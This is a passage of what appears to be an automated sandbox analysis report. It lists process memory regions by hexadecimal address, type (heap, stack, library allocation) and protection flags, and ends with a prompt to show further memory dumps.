page read and write
|
||
|
D4A7F7E000
|
stack
|
page read and write
|
||
|
1D4EBBB9000
|
heap
|
page read and write
|
||
|
25025920000
|
heap
|
page execute and read and write
|
||
|
E70000
|
heap
|
page read and write
|
||
|
71530BE000
|
stack
|
page read and write
|
||
|
250259B3000
|
trusted library allocation
|
page read and write
|
||
|
7FF887BB0000
|
trusted library allocation
|
page read and write
|
||
|
105B000
|
heap
|
page read and write
|
||
|
1D4E9C98000
|
heap
|
page read and write
|
||
|
61AE000
|
stack
|
page read and write
|
||
|
25025A9A000
|
trusted library allocation
|
page read and write
|
||
|
1D4E9D15000
|
heap
|
page read and write
|
||
|
D4A7FFE000
|
stack
|
page read and write
|
||
|
2DFA000
|
trusted library allocation
|
page read and write
|
||
|
7FF887AB0000
|
trusted library allocation
|
page read and write
|
||
|
7152CFE000
|
stack
|
page read and write
|
||
|
7FF887B60000
|
trusted library allocation
|
page read and write
|
||
|
52C0000
|
heap
|
page read and write
|
||
|
56F9000
|
trusted library allocation
|
page read and write
|
||
|
7FF887A40000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D4EB860000
|
heap
|
page read and write
|
||
|
1DFB688E000
|
trusted library allocation
|
page read and write
|
||
|
1DFCD385000
|
heap
|
page read and write
|
||
|
25025A92000
|
trusted library allocation
|
page read and write
|
||
|
250259DD000
|
trusted library allocation
|
page read and write
|
||
|
1DFB6AA2000
|
trusted library allocation
|
page read and write
|
||
|
7FF887A11000
|
trusted library allocation
|
page read and write
|
||
|
1D4EBC34000
|
heap
|
page read and write
|
||
|
1D4EA085000
|
heap
|
page read and write
|
||
|
25025AAC000
|
trusted library allocation
|
page read and write
|
||
|
7FF887906000
|
trusted library allocation
|
page read and write
|
||
|
1DFB5191000
|
trusted library allocation
|
page read and write
|
||
|
250359FD000
|
trusted library allocation
|
page read and write
|
||
|
7FF887980000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF887A70000
|
trusted library allocation
|
page read and write
|
||
|
1D4EBBD6000
|
heap
|
page read and write
|
||
|
12E0000
|
trusted library allocation
|
page read and write
|
||
|
616D000
|
stack
|
page read and write
|
||
|
626E000
|
stack
|
page read and write
|
||
|
71527E3000
|
stack
|
page read and write
|
||
|
FB4000
|
trusted library allocation
|
page read and write
|
||
|
250259DF000
|
trusted library allocation
|
page read and write
|
||
|
2503DBB6000
|
heap
|
page read and write
|
||
|
6CCE000
|
stack
|
page read and write
|
||
|
1DFB3399000
|
heap
|
page read and write
|
||
|
7FF887BE8000
|
trusted library allocation
|
page read and write
|
||
|
1DFC51FE000
|
trusted library allocation
|
page read and write
|
||
|
2503DBE3000
|
heap
|
page read and write
|
||
|
7FF887AA0000
|
trusted library allocation
|
page read and write
|
||
|
1D4E9D6F000
|
heap
|
page read and write
|
||
|
E75000
|
heap
|
page read and write
|
||
|
7FF887A10000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D4E9CBC000
|
heap
|
page read and write
|
||
|
12C0000
|
heap
|
page execute and read and write
|
||
|
DD0000
|
heap
|
page read and write
|
||
|
1D4EBBDE000
|
heap
|
page read and write
|
||
|
28ACAFF000
|
stack
|
page read and write
|
||
|
1D4EBC04000
|
heap
|
page read and write
|
||
|
56BD000
|
stack
|
page read and write
|
||
|
1DFB55B0000
|
trusted library allocation
|
page read and write
|
||
|
2503DB10000
|
heap
|
page read and write
|
||
|
25023B10000
|
heap
|
page read and write
|
||
|
7FF887854000
|
trusted library allocation
|
page read and write
|
||
|
1DFB3390000
|
heap
|
page read and write
|
||
|
25025AA6000
|
trusted library allocation
|
page read and write
|
||
|
7FF887BF0000
|
trusted library allocation
|
page read and write
|
||
|
25023C1D000
|
heap
|
page read and write
|
||
|
FD2000
|
trusted library allocation
|
page read and write
|
||
|
1D4EBBC2000
|
heap
|
page read and write
|
||
|
2503DD10000
|
heap
|
page read and write
|
||
|
5950000
|
heap
|
page read and write
|
||
|
1DFB6846000
|
trusted library allocation
|
page read and write
|
||
|
7FF887AC0000
|
trusted library allocation
|
page read and write
|
||
|
7FF887BD1000
|
trusted library allocation
|
page read and write
|
||
|
1DFC5479000
|
trusted library allocation
|
page read and write
|
||
|
25023BA0000
|
trusted library allocation
|
page read and write
|
||
|
FD0000
|
trusted library allocation
|
page read and write
|
||
|
250254B6000
|
heap
|
page read and write
|
||
|
1D4EBBBA000
|
heap
|
page read and write
|
||
|
1DFB6841000
|
trusted library allocation
|
page read and write
|
||
|
28ACFFE000
|
stack
|
page read and write
|
||
|
2503DB30000
|
heap
|
page read and write
|
||
|
2DEB000
|
trusted library allocation
|
page read and write
|
||
|
7152FBB000
|
stack
|
page read and write
|
||
|
25023C88000
|
heap
|
page read and write
|
||
|
1DFB3270000
|
heap
|
page read and write
|
||
|
25023BBA000
|
heap
|
page read and write
|
||
|
D4A857E000
|
stack
|
page read and write
|
||
|
1D4EBBD2000
|
heap
|
page read and write
|
||
|
1DFCD398000
|
heap
|
page read and write
|
||
|
1D4EBC04000
|
heap
|
page read and write
|
||
|
1D4E9D6F000
|
heap
|
page read and write
|
||
|
1D4E9D42000
|
heap
|
page read and write
|
||
|
7FF887B70000
|
trusted library allocation
|
page read and write
|
||
|
28ACBFE000
|
stack
|
page read and write
|
||
|
1DFB5589000
|
trusted library allocation
|
page read and write
|
||
|
1D4EBBB0000
|
heap
|
page read and write
|
||
|
1DFB3630000
|
heap
|
page read and write
|
||
|
1DFCD2DC000
|
heap
|
page read and write
|
||
|
14E0000
|
heap
|
page read and write
|
||
|
1DFB4CA0000
|
trusted library allocation
|
page read and write
|
||
|
1DFCD630000
|
heap
|
page read and write
|
||
|
7FF887A60000
|
trusted library allocation
|
page read and write
|
||
|
1DFC5487000
|
trusted library allocation
|
page read and write
|
||
|
7FF887AE0000
|
trusted library allocation
|
page read and write
|
||
|
D4A80FF000
|
stack
|
page read and write
|
||
|
2E1C000
|
trusted library allocation
|
page read and write
|
||
|
D4A83FC000
|
stack
|
page read and write
|
||
|
1D4E9CC1000
|
heap
|
page read and write
|
||
|
25025F90000
|
trusted library allocation
|
page read and write
|
||
|
E6E000
|
stack
|
page read and write
|
||
|
12F0000
|
heap
|
page read and write
|
||
|
25025480000
|
trusted library allocation
|
page read and write
|
||
|
1DFB6D7E000
|
trusted library allocation
|
page read and write
|
||
|
7FF887910000
|
trusted library allocation
|
page execute and read and write
|
There are 460 hidden memdumps, click here to show them.